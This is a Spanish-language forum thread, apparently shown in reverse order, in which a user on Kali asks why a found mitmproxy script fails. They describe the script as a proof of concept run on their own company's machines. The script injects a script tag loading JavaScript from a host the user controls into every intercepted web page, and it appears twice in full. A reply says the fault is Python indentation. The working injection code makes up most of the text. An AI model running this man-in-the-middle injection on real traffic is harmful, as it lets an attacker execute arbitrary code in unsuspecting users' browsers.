Mensajes

el foro no apoya a ilegales......o no éticos

paso de buscar citas......

como no me conoces de nada entiendo que tienes razones suficientes (por mi nick o no sé por qué) para decirme que realizo acciones ilegales/no éticos

no sé qué tiene de ilegal realizar POC's en los equipos de mi propia empresa, para poner tonterías mejor no escribas; o si lo haces no prejuzgues

es un problema de sangría... python es sensible con los espacios a la izquierda, distningue espacios de tabulaciones y la cantidad de los mismos

muchas gracias ya está solucionado 

[# Usage: mitmdump -s "js_injector.py src"# (this script works best with --anticache)from bs4 import BeautifulSoupfrom libmproxy.protocol.http import decoded# On start of proxy server ask for src as an argumentdef start(context, argv): if len(argv) != 2: raise ValueError('Usage: -s "js_injector.py src"') context.src_url = argv[1]def response(context, flow): if flow.request.host in context.src_url: return # Make sure JS isn't injected to itself with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) if html.body: script = html.new_tag( "script", src=context.src_url, type='application/javascript') html.body.insert(0, script) flow.response.content = str(html) context.log("Script injected.")]

Buenas,

estoy tratando de hacer una POC que me he encontrado, y no soy capaz de inyectar el código que quiero a ver si me podéis echar un cable.

Estoy usando

KALI 2
--------
mitmproxy

y un script que me he encontrado por ahí para inyectar código JS.

# Usage: mitmdump -s "js_injector.py src"
# (this script works best with --anticache)
from bs4 import BeautifulSoup
from libmproxy.protocol.http import decoded

# On start of proxy server ask for src as an argument
def start(context, argv):
   if len(argv) != 2:
       raise ValueError('Usage: -s "js_injector.py src"')
   context.src_url = argv[1]


def response(context, flow):
   if flow.request.host in context.src_url:
       return # Make sure JS isn't injected to itself
   with decoded(flow.response):  # Remove content encoding (gzip, ...)
       html = BeautifulSoup(flow.response.content)
       if html.body:
           script = html.new_tag(
               "script",
               src=context.src_url,
               type='application/javascript')
           html.body.insert(0, script)
           flow.response.content = str(html)
           context.log("Script injected.")

Hago la redirección de tráfico HTTP y HTTPS al 8080 de mitmproxy; y el problema viene cuando trato de hacer la inyección llamando al script de java que subo a mi
python -m SimpleHTTPServer 80



alguna idea de este error?